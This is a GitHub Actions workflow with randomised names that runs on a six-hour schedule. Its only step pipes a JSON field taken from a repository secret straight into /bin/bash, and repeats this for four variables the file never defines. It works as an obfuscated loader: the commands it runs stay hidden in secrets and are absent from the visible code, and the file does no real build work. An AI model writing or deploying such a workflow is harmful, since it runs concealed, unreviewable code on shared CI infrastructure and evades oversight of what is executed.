name: tonghugjiga

on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tonghugjiga
        env:
          wye80: ${{ secrets.wye80 }}
        run: |
          echo $wye80 | jq -r .mnz675 | /bin/bash
          echo $gym9 | jq -r .yrze61323 | /bin/bash
          echo $iqj015 | jq -r .y77892 | /bin/bash
          echo $u78801 | jq -r .dwz31 | /bin/bash
          echo $dd39 | jq -r .ja9285 | /bin/bash

